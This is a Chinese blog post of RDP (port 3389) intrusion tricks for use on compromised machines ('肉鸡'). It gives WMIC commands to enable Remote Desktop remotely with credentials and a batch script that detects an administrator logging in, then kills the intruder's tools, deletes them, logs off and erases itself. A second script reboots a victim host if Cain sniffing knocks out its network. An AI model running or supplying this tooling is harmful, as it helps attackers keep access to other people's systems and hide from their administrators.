3389的一些技巧

收集了一些很实用的脚本,渗透基本上都会用的到:

用win命令查找3389的port(包括修改后的):

C:\>tasklist /svc |find “TermService”
svchost.exe 1300 TermService
C:\>netstat -ano |find “1300″
TCP 0.0.0.0:61321 0.0.0.0:0 LISTENING 1300
TCP 210.72.225.74:61321 123.114.166.67:1697 ESTABLISHED 1300

用win命令开3389:

wmic RDTOGGLE WHERE ServerName=’%COMPUTERNAME%’ call SetAllowTSConnections 1

开远程:WMIC /node:”远程机器名” /user:”administrator” /password:”lcx” RDTOGGLE WHERE ServerName=’远程机器名’ call

监视3389登录并删除、注销的脚本:

主要用于在登陆肉鸡终端的时候,放哨用的。一旦有人连接终端端口(默认端口3389),就发声报警,并对对方是否登陆进行监控。
如果有人登陆终端成功,就自动把指定目录的工具(exe后缀的)循环进行“结束 程序进程”操作,整目录进行删除,然后注销会话并删除自身(不留任何文件),防止工具被管理员偷了
需要根据环境修改的参数如下:
1.终端端口(本程序为3389)
2.FC的判断结果,需要根据肉鸡语言决定(本程序针对EN 2K3版本) 判断字符串为 FC对比无异同的结果取单词 differences
+++++++++++++++++++++++++++++++++++++++++++++++++++
c:\>echo a>1
c:\>echo a>2
c:\>fc /b 1 2
Comparing files 1 and 2
FC: no differences encountered
+++++++++++++++++++++++++++++++++++++++++++++++++++++
%temp%\down 此目录是用来放要运行的工具的,EXE后缀的程序,当终端有别人登录时会被程序自动结束进程(所有EXE后缀的文件循环一遍)
以下是bat脚本:
@echo off
rem program by NetPatch
netstat -an|find “:3389″>%temp%\port_one.log
quser>%temp%\check_one.log
:begin
choice /C UM /T 5 /D U
netstat -an|find “:3389″>%temp%\port_two.log
fc /b %temp%\port_one.log %temp%\port_two.log|find “differences”&&goto begin
echo &echo &echo &echo &echo
choice /C UM /T 3 /D U
echo &echo &echo &echo &echo
rem [^G Sound warning]
:check
quser>%temp%\check_two.log
fc /b %temp%\check_one.log %temp%\check_two.log|find “differences”&&goto check
for /f %%k in (‘dir /b /a-d %temp%\down\*.exe’) do taskkill /f /im %%k
echo Y|rmdir %temp%\down /s
rem down [Put Tools]
del %temp%\*.log
logoff
del %0

防止cain挂掉网络

很多朋友在嗅探的时候肉猪一不小心就挂了.那个后悔啊…..
当然 你要选择尽量少的服务来嗅.比如你要嗅目标的1433及80.那你嗅其他的就没用罗.
这样会大大的减少当机的可能性.如果看到丢包率超过10%就要注意啦. 赶紧停掉,看看那里没设置好吧.
如果还是不小心挂了呢.
没事.这里为您准备了一个BAT 在开嗅的时候运行它就行了哦.
======start=========
:ping
choice /C YN /T 120 /D Y
ping g.cn
IF ERRORLEVEL 1 GOTO reboot
IF ERRORLEVEL 0 GOTO ping
:reboot
shutdown /r /t 0
======end=========
这里的g.cn你可以设置为网关的IP或你的IP
如果能ping通的话就继续ping 如果不通的话就认为当机了 (当然,你要事先测试下是否原先可ping,或者改为丢包也挺不错)
然后就重启了,不过用重启是很容易被发现的,最好或自己写一些语句,像结束cain等,也可以调用上一个脚本,自由发挥 。

posted @ 2011-10-02 05:23  WHaa_(T_T)  阅读(293)  评论(0编辑  收藏  举报